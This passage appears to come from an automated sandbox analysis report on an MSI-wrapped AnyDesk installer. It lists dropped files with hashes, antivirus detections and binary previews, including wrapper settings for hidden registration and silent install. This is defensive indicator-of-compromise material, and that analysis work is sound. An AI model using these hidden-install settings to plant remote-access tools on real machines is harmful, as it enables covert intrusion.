                                                                              Size (bytes):3048
                                                                              Entropy (8bit):3.694456222285318
                                                                              Encrypted:false
                                                                              SSDEEP:48:2QzaN38RN3x0/7wP8aZntCwL7feGp9bHfOIgbR1fOIgBKEBKRC6v6ReyZ:2QzI4uU/vfHzbOHXOHB9BpiW
                                                                              MD5:5F246453E47299A07D8C949665C8A0FE
                                                                              SHA1:5B341BA26C94F782A34C5523FAC302B7BCD3411A
                                                                              SHA-256:2EA3134921D1CD1F5E95079CE163D36DE1351A6361410967016DC69F0291F419
                                                                              SHA-512:DE72396CF4181BAC60E006E18A83519A9B3DF6E56FFACAAEDF9308CD8C4717B9E520DCACEE735803663DB6F661C5E5E04647B1443B73CFA474307AFC75C0CA28
                                                                              Malicious:false
                                                                              Preview:.D.....M..,....c.Pc<.......................^..E.X.<m...8.......@..5...........M..0.<fK...; ...............................$.......8...Q.......Q...I.n.s.t.a.l.l.e.d. .A.n.y.d.e.s.k. .-. .U.N.R.E.G.I.S.T.E.R.E.D. .-. .W.r.a.p.p.e.d. .u.s.i.n.g. .M.S.I. .W.r.a.p.p.e.r. .f.r.o.m. .w.w.w...e.x.e.m.s.i...c.o.m.................C.:.\.W.i.n.d.o.w.s.\...............1.7.9.6.0.5.................W.O.R.K.G.R.O.U.P.......Zi.A.@.H..i.tE<.....................).(?..P............. ...2.......2...\.\.?.\.V.o.l.u.m.e.{.8.0.4.9.f.1.9.8.-.1.0.1.6.-.1.1.e.7.-.b.8.7.b.-.8.0.6.e.6.f.6.e.6.9.6.3.}.\...............C.:.\...........N).A.j..j...............(...0.......,...2.......2...\.\.?.\.V.o.l.u.m.e.{.8.0.4.9.f.1.9.8.-.1.0.1.6.-.1.1.e.7.-.b.8.7.b.-.8.0.6.e.6.f.6.e.6.9.6.3.}.\.......4...............(.C.:.).........<...@...D...H...L...P...T...X...\...`...d...h...l...p...t...x...|.......%.......%...A.d.o.b.e. .A.c.r.o.b.a.t. .R.e.a.d.e.r. .D.C. .1.9...0.1.0...2.0.0.9.8.....).......)...A.d.o.b.e. .F.l.a.s.h. .P.l.

                                                                              C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files.cab

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                              File Type:Microsoft Cabinet archive data, 3811024 bytes, 1 file
                                                                              Category:dropped
                                                                              Size (bytes):3811024
                                                                              Entropy (8bit):7.999935868582085
                                                                              Encrypted:true
                                                                              SSDEEP:98304:bvXhd7YjjTcLO6KnQh5YUNa/ckQGQCWijuYAHwO:bzkTciIYUNuNCAuPHD
                                                                              MD5:223FA9756FCE44168ABD5DB7AFA03FAD
                                                                              SHA1:2E8BFC88819353490EC4C201445DC004FA9AAFF5
                                                                              SHA-256:A929C064C064A1B5013B8FBCE01FEB7AE08E6BD9B05106DCDA8320F9DB0FB13D
                                                                              SHA-512:0EFE5917995E6EE837AADBB9951AD1F7BCADFA9638DE747B219E6A9BBE53FD586118A291776C6FF1C0416B3B439DADB0336AE61E74B1E6D12E9A38F11DAC33EC
                                                                              Malicious:false
                                                                              Preview:MSCF.....&:.....,...............~...H...v.....:........T.p .install.exe.....W..[.....H..."T.#..m...U.e..p..n.I:....h<d.r)R.*+.-[...y/c..1..x.w...>..."...TI1[(........5.H......F..j.....}}K......O....%...o".Pj/M2Io..t.....B/Z...Bk.........8..,jA.rI`..rr....I#)R...5?I...h.........C..L...S.fP$..$H.D4..iq6....4.......kq.........#.*..!X....+.C......-p-.'..Od...lY...E...!.A..'..qY.%l........6....1.......~.}.4....{."...e.(/M^,N..x|d.../..@.,.Wb..I.j..]D'....T..w..Y_...*.{............R.-.......r...;..)...f..!/.:....l+.t5....V...Q+.Q.#.I..@..k...Q..'(...T\.7...A.'?..K....b_.o.[...w......|............r.7...."].ys.P.N.....o.K7.......{..(.y3..o..I............wp.....w.^.]..g.n.;lp.$..p......p^......=r.R.LH...{....|..^=..ZM2....n.L...$...S.......<E`.7o.{-MX.U,.t..I.7..[.<.IH...T..A......Y=._V..0...4h........([.%W_..,{.?.#.C.s]..<Q]Q...AM...w.....S.!.B.q....vR.V>..l..#....+%..X.m&}.d-.<.'$..6.{......!.`..%....ZF.`{.u.P....mZ4...H.........J3h)....(..0(...2..

                                                                              C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\$dpx$.tmp\eee52229ee24a34cb61191d27a7b66f1.tmp

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3837440
                                                                              Entropy (8bit):7.998303388385036
                                                                              Encrypted:true
                                                                              SSDEEP:98304:dDFWG1bqjvcLIsoh5GbmkNC3dv2tthJ2/Ev6l3:d7svcsImkN4chYECl
                                                                              MD5:8C42AB81F90EE0592F7A709F0F7E320B
                                                                              SHA1:6656C6CA4611245CDA44958BAB84866196C9D95B
                                                                              SHA-256:BEB6182CEAB6EA0B0FDC0F41F8069632317E0F941419B75EDE4145593CD6A21C
                                                                              SHA-512:57A444D1B03DCD428EB386E5551137DF5B7D401AC39F5B3481DAD6A94C7A95C3DD90B638532EFDD813C293CF4F949ED4461424FA940410F2D59E2DFDD88CA5EA
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: Virustotal, Detection: 64%, Browse
                                                                              • Antivirus: Metadefender, Detection: 22%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 65%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*r..n...n...n.......q....3..o.......o...Richn...........................PE..L.....b.....................|:.....$........ ....@...........................:......m;.....................................p ..P....@...p:.......................................................................... ..l............................text...z........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc....p:..@...r:.................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe (copy)

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3837440
                                                                              Entropy (8bit):7.998303388385036
                                                                              Encrypted:true
                                                                              SSDEEP:98304:dDFWG1bqjvcLIsoh5GbmkNC3dv2tthJ2/Ev6l3:d7svcsImkN4chYECl
                                                                              MD5:8C42AB81F90EE0592F7A709F0F7E320B
                                                                              SHA1:6656C6CA4611245CDA44958BAB84866196C9D95B
                                                                              SHA-256:BEB6182CEAB6EA0B0FDC0F41F8069632317E0F941419B75EDE4145593CD6A21C
                                                                              SHA-512:57A444D1B03DCD428EB386E5551137DF5B7D401AC39F5B3481DAD6A94C7A95C3DD90B638532EFDD813C293CF4F949ED4461424FA940410F2D59E2DFDD88CA5EA
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Virustotal, Detection: 64%, Browse
                                                                              • Antivirus: Metadefender, Detection: 22%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 65%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*r..n...n...n.......q....3..o.......o...Richn...........................PE..L.....b.....................|:.....$........ ....@...........................:......m;.....................................p ..P....@...p:.......................................................................... ..l............................text...z........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc....p:..@...r:.................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\msiwrapper.ini

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1426
                                                                              Entropy (8bit):3.650455137438292
                                                                              Encrypted:false
                                                                              SSDEEP:24:udX8DW8XjsjToZkESrFEqNbH+qNbH4yDqNbHgO+sD+n:uYg1JFxNvNE7Nxyn
                                                                              MD5:F03B2CD5999D483E566FED5D7E1BD078
                                                                              SHA1:EBC636C000806FBCD93952B3B4BFB97BF281E2F9
                                                                              SHA-256:36CCB8B1213585E1CD56DEF34AC141DD8653AA0050A0C4105FA4C285AC3CC084
                                                                              SHA-512:83690F70DCD916684C0CBE302A35C96909D31D6C6D06F0BE6950D59ACE0B834EC69021B851E9C30A0B594A5DA7044EBA3F0CADD0417FA588DCE148AFB921E1C6
                                                                              Malicious:false
                                                                              Preview:W.r.a.p.p.e.d.A.p.p.l.i.c.a.t.i.o.n.I.d.=.A.n.y.D.e.s.k...W.r.a.p.p.e.d.R.e.g.i.s.t.r.a.t.i.o.n.=.H.i.d.d.e.n...I.n.s.t.a.l.l.S.u.c.c.e.s.s.C.o.d.e.s.=.0...E.l.e.v.a.t.i.o.n.M.o.d.e.=.n.e.v.e.r...B.a.s.e.N.a.m.e.=.i.n.s.t.a.l.l...e.x.e...C.a.b.H.a.s.h.=.a.9.2.9.c.0.6.4.c.0.6.4.a.1.b.5.0.1.3.b.8.f.b.c.e.0.1.f.e.b.7.a.e.0.8.e.6.b.d.9.b.0.5.1.0.6.d.c.d.a.8.3.2.0.f.9.d.b.0.f.b.1.3.d...S.e.t.u.p.P.a.r.a.m.e.t.e.r.s.=...W.o.r.k.i.n.g.D.i.r.=...C.u.r.r.e.n.t.D.i.r.=.*.S.O.U.R.C.E.D.I.R.*...U.I.L.e.v.e.l.=.5...F.o.c.u.s.=.y.e.s...S.e.s.s.i.o.n.D.i.r.=.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.4.a.7.5.4.4.4.8.-.1.3.7.2.-.4.b.6.2.-.a.f.7.7.-.6.f.1.6.5.0.2.4.6.a.5.a.\...F.i.l.e.s.D.i.r.=.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.4.a.7.5.4.4.4.8.-.1.3.7.2.-.4.b.6.2.-.a.f.7.7.-.6.f.1.6.5.0.2.4.6.a.5.a.\.f.i.l.e.s.\...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.F.i.l.e.=...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.P.a.r.a.m.e.t.e.r.s.=...R.u.n.A.f.t.e.r.I.n.

                                                                              C:\Users\user\AppData\Local\Temp\~DF0154135B388C6B07.TMP

                                                                              Download File
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):32768
                                                                              Entropy (8bit):0.06743406194521226
                                                                              Encrypted:false
                                                                              SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOv+eHmNfftCVky6lh1:2F0i8n0itFzDHFv+eGBTj
                                                                              MD5:F6D7E066F3F3BFE6E80C388A8E80530D
                                                                              SHA1:4113DA23B498529E7D373BB6B15C511E6215CBF0
                                                                              SHA-256:6FD79F05C77A1C8CB5D73B1FEC2B16E09273E029DDC196F24115C57178C7D1EC
                                                                              SHA-512:AB982CEEAEF2E1D690BC761C129EC387C4919BCF910513387D9D46111FDD9768F66E1CD46311FD169BD1122356DE71964590DE087B06A8BA966216EA7736E464
                                                                              Malicious:false
                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\~DF49DA8C305B58D2AD.TMP

                                                                              Download File
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):69632
                                                                              Entropy (8bit):0.12990324508728232
                                                                              Encrypted:false
                                                                              SSDEEP:24:Ojd8vdOQCwY+8JfAebfddipV7sddipVlVIwGVlrkg9Syve+QG:I8virfddSBsddSH2rjeNG
                                                                              MD5:DAEC78D92F1DF6670EB07754808C3ECC
                                                                              SHA1:F59648041B22EC5BFE871E08EDB40278B85A5BD2
                                                                              SHA-256:8DCAE1DCF7F1AA8B3F96C78805593524994AA603C611E6B9523CBCB93A774354
                                                                              SHA-512:FC8D121F8B877528B6E902869E931A74F88097870B8F0CD66213F9F3ACC8A431619EAD27D45DD4EE75B79CE77BB414E641FCC0A495C0B67A1FE900FB36B5183B
                                                                              Malicious:false
                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\~DFFAFE55FFC650FC61.TMP

                                                                              Download File
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):512
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3::
                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                              Malicious:false
                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Roaming\AnyDesk\ad.trace

                                                                              Download File
                                                                              Process:C:\ProgramData\anydesk.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:modified
                                                                              Size (bytes):10515
                                                                              Entropy (8bit):4.228344603555986
                                                                              Encrypted:false
                                                                              SSDEEP:96:EtFBqt1tNtFZmKJ4FgzgFN5mj4b515wvOQ8kQVQbQWttAhDFhttFCxxv:0wPHFcKFjw9ksQNttvxV
                                                                              MD5:C4D40B6620A5E49C215BFB0C04D9FA94
                                                                              SHA1:84C02E79A8DD2CEA191AF99341F2271A6139DC48
                                                                              SHA-256:1604100784E9D590149D5221F7F4318AFAE913A22EA07F6EA461F8D215EDFA25
                                                                              SHA-512:06F4EE0DFFB5231F59327920110B48566C4B6FFA35FEC1113F84CE1FAE0C932ACD07F01E2AEA022FF7DDE2A5601C2391B6333E0FFCC2B4B8D7F1DC270F03E154
                                                                              Malicious:false
                                                                              Preview: * * * * * * * * * * * * * * * * * *.. info 2022-08-06 01:23:23.745 installer 2640 2428 main - * AnyDesk Windows Startup *.. info 2022-08-06 01:23:23.745 installer 2640 2428 main - * Version 7.0.7 (release/win_7.0.x 96f8d80eac273a9144abccce2f66dbc2200cc81d).. info 2022-08-06 01:23:23.745 installer 2640 2428 main - * Custom Client (no ID).. info 2022-08-06 01:23:23.745 installer 2640 2428 main - .. info 2022-08-06 01:23:23.745 installer 2640 2428 main - Process started at 2022-08-06. PID 2640. OS is Windows 7 (64 bit).. info 2022-08-06 01:23:23.745 installer 2640 2428 impl_selector - using sse2 (intrinsics)..warning 2022-08-06 01:23:23.745 installer 2640 2428 terminator - All clear!.. info 2022-08-06 01:23:23.745 installer

                                                                              C:\Users\user\AppData\Roaming\AnyDesk\user.conf

                                                                              Download File
                                                                              Process:C:\ProgramData\anydesk\AnyDesk.exe
                                                                              File Type:ASCII text, with very long lines
                                                                              Category:dropped
                                                                              Size (bytes):1003
                                                                              Entropy (8bit):4.272230203413794
                                                                              Encrypted:false
                                                                              SSDEEP:24:snKoXHZgCJg2cZ0FmienKoX1M61n0Q17/iMQBbSI:sn1j2genMa0CHQBbSI
                                                                              MD5:BB28C065F16674CB7688B72C683EC985
                                                                              SHA1:2D7E18B400398CDC33A387C315D434C9FFDA0CB0
                                                                              SHA-256:FE5DD9BE649AB519A47659B151A2607AC623179F150765C399B1EF0C7A90F82E
                                                                              SHA-512:6995413F415F6D708254C0BD6388B397B181B6BAF28B3D9182E50404556CBC8C38AB0CED5A2A93550DA5FBD2EDBC7945E3E2F24AD0358FBC00A3494A7040DD4E
                                                                              Malicious:false
                                                                              Preview:ad.invite.created_list_encrypted=6fa74c609a01f31f1f670668df954f4642a4aae8018a18da425960b3eca6f8f4a1ec65a7e7bb22120bf648310f1fa2df0b53d2e90e4e008262013ecaea920fe5fd03c1aa69649c8b8b7110ec222522013f23dfea2c5de548b20a73a9d414c27374ab0862b47b212f41cf5778b89cca6521ac5f446f5a2ffbbe9811a458492e39926770649a38e9721366902a51645470f0d9e8a0d72bdda1c667dc1fbaea3cca74dd806804e91cbf13cfc3d8e58bf6cc1ef38cac7e2c3206610342c063879a2bdf13cf19bf043a5ac522ccccbbc23a319d59a30a59c069535a7b8f54c7cdf18ddd032a16d9ee.ad.invite.received_list_encrypted=6fa74c609a01f31f1f670668df954f4642a4aae8018a18da425960b3eca6f8f4a1ec65a7e7bb22120bf648310f1fa2df0b53d2e90e4e008262013ecaea920219e161c9e6f996ad5835c58dfc95d32660f8f91a7ceb734bd5c905f6e04db3c27374ab0862b47b212f41cf5778b89c037c550169499eb92f75a169d19422002633e9f784bb1abb9c7461a00b08edbb5470f0d99f57071e94afc197f90cdd3c896084ac806804e96c7ac9eb148905cb1bf54d6113d0c1ffff947be9e29fdf46c726ed7608deda5eebf876a0049476f5d19458050a6ce61fb3fbce38819f06f911de17a54117d6af.ad.ui.lang=

                                                                              C:\Windows\Installer\78c341.msi

                                                                              Download File
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 0.7.0.0, Subject: Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Anydesk, Keywords: Installer, Template: Intel;1033, Revision Number: {8CB27BF3-59BC-4419-BE15-E9E385453F27}, Create Time/Date: Thu Feb 18 21:32:30 2021, Last Saved Time/Date: Thu Feb 18 21:32:30 2021, Number of Pages: 200, Number of Words: 2, Name of Creating Application: MSI Wrapper (10.0.50.0), Security: 2
                                                                              Category:dropped
                                                                              Size (bytes):4063232
                                                                              Entropy (8bit):7.978539254164263
                                                                              Encrypted:false
                                                                              SSDEEP:98304:pp+vXhd7YjjTcLO6KnQh5YUNa/ckQGQCWijuYAHw:+zkTciIYUNuNCAuPH
                                                                              MD5:6CF5AD7A7D1B7BAB0C62E246CF41A985
                                                                              SHA1:B06A03ADC550EAD96534F5E723395C4E16BFDF44
                                                                              SHA-256:FB9F0BF2B71BF576053C56CB913EA4E93581FC9D3AA9D6D8A0AE572A1622F050
                                                                              SHA-512:46CD8BD1EAD75A8ADB7D5BFF81A2FDC04567D462E965664F6F9F796237839F07F74D2201C3DA8F7F37C9DFC45749ED88708DB5A216D84F7AC146E5AF58A8608E
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Windows\Installer\78c342.ipi

                                                                              Download File
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                              Category:dropped
                                                                              Size (bytes):20480
                                                                              Entropy (8bit):1.5498517775518001
                                                                              Encrypted:false
                                                                              SSDEEP:24:J7rFC/llm6cpmUHCpVluqo+QG0/rddipVlVIwGVlrkg9SCddipV7eJfAebpQCwYi:1r0pcDHoluzNG0zddSH2rbddSBerF8v
                                                                              MD5:14F8EB017B55B6EFBBC74E949581F9F7
                                                                              SHA1:E9B5537C29E22FAC2A7535C766579710CC901AC4
                                                                              SHA-256:486813FA64D996C93CB8251845F093C0F26C0277ACFF9C06004DE34EB825CFBE
                                                                              SHA-512:E9222151D1E201A06F39CBFFE9F786F968B45226DBDFEA99A0DC6746820247D23AEEB74312277BBF40B060ADDDF7734E70527CE824C55DB32A55D637012202DA
                                                                              Malicious:false
                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Windows\Installer\78c344.msi

                                                                              Download File
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 0.7.0.0, Subject: Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Anydesk, Keywords: Installer, Template: Intel;1033, Revision Number: {8CB27BF3-59BC-4419-BE15-E9E385453F27}, Create Time/Date: Thu Feb 18 21:32:30 2021, Last Saved Time/Date: Thu Feb 18 21:32:30 2021, Number of Pages: 200, Number of Words: 2, Name of Creating Application: MSI Wrapper (10.0.50.0), Security: 2
                                                                              Category:dropped
                                                                              Size (bytes):4063232
                                                                              Entropy (8bit):7.978539254164263
                                                                              Encrypted:false
                                                                              SSDEEP:98304:pp+vXhd7YjjTcLO6KnQh5YUNa/ckQGQCWijuYAHw:+zkTciIYUNuNCAuPH
                                                                              MD5:6CF5AD7A7D1B7BAB0C62E246CF41A985
                                                                              SHA1:B06A03ADC550EAD96534F5E723395C4E16BFDF44
                                                                              SHA-256:FB9F0BF2B71BF576053C56CB913EA4E93581FC9D3AA9D6D8A0AE572A1622F050
                                                                              SHA-512:46CD8BD1EAD75A8ADB7D5BFF81A2FDC04567D462E965664F6F9F796237839F07F74D2201C3DA8F7F37C9DFC45749ED88708DB5A216D84F7AC146E5AF58A8608E
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Windows\Installer\MSI5B7A.tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):428024
                                                                              Entropy (8bit):6.5173927188942296
                                                                              Encrypted:false
                                                                              SSDEEP:12288:stJRQ+gjpjegLyo8ktJRQ+gjpjegLyo8J:stBcpVLSktBcpVLSJ
                                                                              MD5:9069E5D699573FA8DE65F4D66FC36782
                                                                              SHA1:3F6D828772867E2708F4491DE44C57FE3987F931
                                                                              SHA-256:7F7DDF73140A3568819DE6AC422D2B42A76856FE96C2A658AF531ADB3BBD9B33
                                                                              SHA-512:C7614A19E126273A7464F16EF3470C4B4CE459119CBC489DE9DCDDDC5DBE2057AAAE77D551F8C26A9EB59E2FEAB373C1C565921379564EFF9ED4CE85EDF9717C
                                                                              Malicious:false
                                                                              Preview:...@IXOS.@.....@...U.@.....@.....@.....@.....@.....@......&.{AC4583F8-6694-473E-BB77-32CDFC9BA940}F.Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com..1.msi.@.....@.....@.....@........&.{8CB27BF3-59BC-4419-BE15-E9E385453F27}.....@.....@.....@.....@.......@.....@.....@.......@....F.Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{EDE10F6C-30F4-42CA-B5C7-ADB905E45BFC}?.02:\SOFTWARE\EXEMSI.COM\MSI Wrapper\Installed\AnyDesk\LogonUser.@.......@.....@.....@........bz.LateInstallFinish1....J...bz.LateInstallFinish1.@.......@..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..

                                                                              C:\Windows\Installer\MSI5BE8.tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):212992
                                                                              Entropy (8bit):6.513444216841171
                                                                              Encrypted:false
                                                                              SSDEEP:3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8
                                                                              MD5:4CAAA03E0B59CA60A3D34674B732B702
                                                                              SHA1:EE80C8F4684055AC8960B9720FB108BE07E1D10C
                                                                              SHA-256:D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D
                                                                              SHA-512:25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......`...........!.....h..........K....................................................@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                              C:\Windows\Installer\MSIB0A0.tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):212992
                                                                              Entropy (8bit):6.513444216841171
                                                                              Encrypted:false
                                                                              SSDEEP:3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8
                                                                              MD5:4CAAA03E0B59CA60A3D34674B732B702
                                                                              SHA1:EE80C8F4684055AC8960B9720FB108BE07E1D10C
                                                                              SHA-256:D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D
                                                                              SHA-512:25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......`...........!.....h..........K....................................................@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                              C:\Windows\Installer\MSIBA33.tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):212992
                                                                              Entropy (8bit):6.513444216841171
                                                                              Encrypted:false
                                                                              SSDEEP:3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8
                                                                              MD5:4CAAA03E0B59CA60A3D34674B732B702
                                                                              SHA1:EE80C8F4684055AC8960B9720FB108BE07E1D10C
                                                                              SHA-256:D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D
                                                                              SHA-512:25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......`...........!.....h..........K....................................................@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                              C:\Windows\Installer\MSIED31.tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):212992
                                                                              Entropy (8bit):6.513444216841171
                                                                              Encrypted:false
                                                                              SSDEEP:3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8
                                                                              MD5:4CAAA03E0B59CA60A3D34674B732B702
                                                                              SHA1:EE80C8F4684055AC8960B9720FB108BE07E1D10C
                                                                              SHA-256:D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D
                                                                              SHA-512:25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
